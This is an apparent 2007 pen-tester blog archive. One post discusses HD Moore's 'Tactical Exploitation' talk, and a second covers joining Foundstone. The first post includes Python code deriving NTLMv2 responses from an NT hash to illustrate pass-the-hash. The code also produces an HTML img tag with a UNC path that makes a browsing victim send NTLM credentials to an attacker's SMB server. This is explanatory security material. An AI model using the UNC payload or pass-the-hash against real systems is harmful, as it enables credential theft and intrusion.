Archive for September, 2007
Tactical Exploitation
by mjw on Sep.15, 2007
At BH/Defcon HD Moore gave a great talk entitled “Tactical Exploitation”. They dragged the talk out a bit long, but mixed in there were several neat tricks and, more importantly, a hacking philosophy that I couldn’t agree with more.
Tactical Exploitation is about being clever. It’s not exploit development; it’s taking existing technology and leveraging it to the attacker’s advantage. A good example is misusing the way NTLM authentication over NetBIOS/SMB works. I’ve seen shops that build HUGE parallel clusters to crack NTLM passwords. It works, but they never quite understood that you don’t need to crack the hashes. Rather, you can simply grab them and re-use them: the NTLM exchange proves knowledge of the hash, not of the password, so the hash is the credential. Yes, there are some reasons to crack them, but that’s beyond the scope here. Tactical Exploitation realizes that you only need the hash, and then builds that into an attack. For example, they embed file share (UNC) paths in HTML so that a browsing user’s machine auto-connects to the attacker’s SMB server and authenticates with the user’s credentials. One distinction worth keeping straight: what that auto-connect hands you is a challenge/response, which you can relay to another host or crack offline, whereas the hash you replay directly in a pass-the-hash attack is the NT hash pulled from a machine you already control.
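To make the “you only need the hash” point concrete, here is an added example (my own code, not from the talk or from this post) that walks the NTLMv2 arithmetic end to end: the NT hash is derived from the password, the challenge/response is computed from the NT hash alone, and the server verifies it against its stored NT hash alone. An attacker holding only the stolen hash therefore produces exactly the response the real client would. The user, domain, password, challenge, timestamp and AV-pair bytes are constructed for the demonstration and correspond to no real system; the hashcat-style line and the HTML snippet show what the embedded-UNC capture side of the trick yields. MD4 is implemented inline because hashlib’s md4 is disabled in many OpenSSL builds.

```python
"""NTLMv2 from the NT hash: why pass-the-hash works and what a UNC capture yields.
Constructed example; every identity, secret and nonce below is made up."""
import hashlib
import hmac
import struct

MASK32 = 0xFFFFFFFF


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK32


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4 (pure Python; hashlib's md4 is often unavailable)."""
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", len(data) * 8)          # bit length, little-endian
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    rounds = (
        (lambda x, y, z: (x & y) | (~x & z), 0, tuple(range(16)), (3, 7, 11, 19)),
        (lambda x, y, z: (x & y) | (x & z) | (y & z), 0x5A827999,
         (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13)),
        (lambda x, y, z: x ^ y ^ z, 0x6ED9EBA1,
         (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15)),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for fn, k, order, shifts in rounds:
            for i, idx in enumerate(order):
                aa = _rotl((aa + fn(bb, cc, dd) + x[idx] + k) & MASK32, shifts[i % 4])
                aa, bb, cc, dd = dd, aa, bb, cc   # rotate register roles (ABCD -> DABC ...)
        a, b, c, d = (a + aa) & MASK32, (b + bb) & MASK32, (c + cc) & MASK32, (d + dd) & MASK32
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> bytes:
    """NT hash = MD4(UTF-16LE(password)). This, not the password, is the NTLM credential."""
    return md4(password.encode("utf-16le"))


def ntlmv2_proof(nt: bytes, user: str, domain: str, server_challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr as the client computes it (MS-NLMP: NTOWFv2 then HMAC-MD5 over challenge+blob).
    The only secret input is the NT hash, which is all pass-the-hash needs."""
    ntowf_v2 = hmac.new(nt, (user.upper() + domain).encode("utf-16le"), hashlib.md5).digest()
    return hmac.new(ntowf_v2, server_challenge + blob, hashlib.md5).digest()


def server_accepts(stored_nt: bytes, user: str, domain: str,
                   server_challenge: bytes, blob: bytes, proof: bytes) -> bool:
    """The verifier recomputes the proof from its stored NT hash; it never sees a password."""
    expected = ntlmv2_proof(stored_nt, user, domain, server_challenge, blob)
    return hmac.compare_digest(expected, proof)


def build_blob(timestamp: int, client_challenge: bytes, target_info: bytes) -> bytes:
    """NTLMv2 'temp' structure: version bytes, timestamp, client nonce, AV pairs, terminator."""
    return (b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", timestamp)
            + client_challenge + b"\x00" * 4 + target_info + b"\x00" * 4)


def hashcat_5600(user: str, domain: str, server_challenge: bytes, proof: bytes, blob: bytes) -> str:
    """What the UNC-in-HTML capture actually gives you: a NetNTLMv2 challenge/response
    (hashcat mode 5600) to relay or crack, not the NT hash itself."""
    return f"{user}::{domain}:{server_challenge.hex()}:{proof.hex()}:{blob.hex()}"


def unc_trigger_html(server: str) -> str:
    """The embedded-share trick: a client rendering this image opens an SMB session to
    `server` and authenticates with the browsing user's NTLM credentials (hypothetical host)."""
    return f'<img src="\\\\{server}\\share\\pixel.gif" width="1" height="1">'


def demo() -> dict:
    # --- constructed scenario; none of these values are real ---
    user, domain = "alice", "CORP"
    server_challenge = bytes.fromhex("0123456789abcdef")
    target_info = bytes.fromhex("02000800") + "CORP".encode("utf-16le")   # AvId 2, AvLen 8
    blob = build_blob(0x01D3ABCDEF012345, bytes.fromhex("aaaaaaaaaaaaaaaa"), target_info)
    # Victim's client: derives the NT hash from the password and answers the challenge.
    victim_nt = nt_hash("Summer2007!")
    victim_proof = ntlmv2_proof(victim_nt, user, domain, server_challenge, blob)
    # Attacker: holds only the NT hash (simulating a SAM/LSASS dump), never the password.
    stolen_nt = bytes(victim_nt)
    attacker_proof = ntlmv2_proof(stolen_nt, user, domain, server_challenge, blob)
    return {
        "same_proof": victim_proof == attacker_proof,
        "accepted": server_accepts(victim_nt, user, domain, server_challenge, blob, attacker_proof),
        "rejected_with_wrong_hash": server_accepts(nt_hash("wrong"), user, domain,
                                                   server_challenge, blob, attacker_proof),
        "capture_line": hashcat_5600(user, domain, server_challenge, victim_proof, blob),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
    print(unc_trigger_html("10.0.0.5"))
```

Note that `ntlmv2_proof` and `server_accepts` are the same function applied from two sides: nothing in the exchange distinguishes a client that knows the password from one that only knows the NT hash. The `hashcat_5600` line is the artifact the embedded-share trick collects; it can be relayed while the session is live or cracked later, which is where the cracking clusters still earn their keep.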
Tactical exploitation is powerful because it’s so simple. Some customers hear “0-day” or “exploit development” and you instantly lose relevance. Only a few government and financial institutions care about that level of attack; the rest (sometimes rightly) regard it as beyond their adversaries’ capability and/or as not a realistic threat given their business. Tests can therefore rapidly spiral into patch management audits, which prove very little. However, by leveraging misconfiguration, user error, and a few clever hacks you can typically gain access.
Tying these tactical attacks together, you can achieve strategic exploitation of the target and be assured of a successful penetration test.
Foundstone
by mjw on Sep.15, 2007
Over a year ago I had a job offer from Foundstone. At the time I declined. There were several reasons for that. One of the larger ones was that the position was in NYC. I think NY is a wonderful city, but I just didn’t feel up to the move. Further, I had some reservations about Foundstone’s approach. Essentially, most of their pen test type work is very fast and formalized. I was interested in pursuing other approaches. So, I spent a year at a company that offered me that opportunity. When I had pen test work it was great. I could execute the tests mostly the way I wanted. I could meet the customer’s needs and do research type work too. Unfortunately the PT work didn’t come often enough.
I had considered several very well known shops in the DC area. Many of them follow a mentality very similar to mine. The problem is that they separate development from services: a pen tester generally won’t write code or exploits. I just can’t fathom this. I’ve worked in this type of environment and it seems to me that the service people become too dependent on the developers and the tools, while at the same time the developers get too far away from hands-on work on the network.
All things considered, I’ve accepted a job with Foundstone (in the DC area). I think their unique mix of business, research, teaching, and writing should offer me the chance to grow in the ways that I want.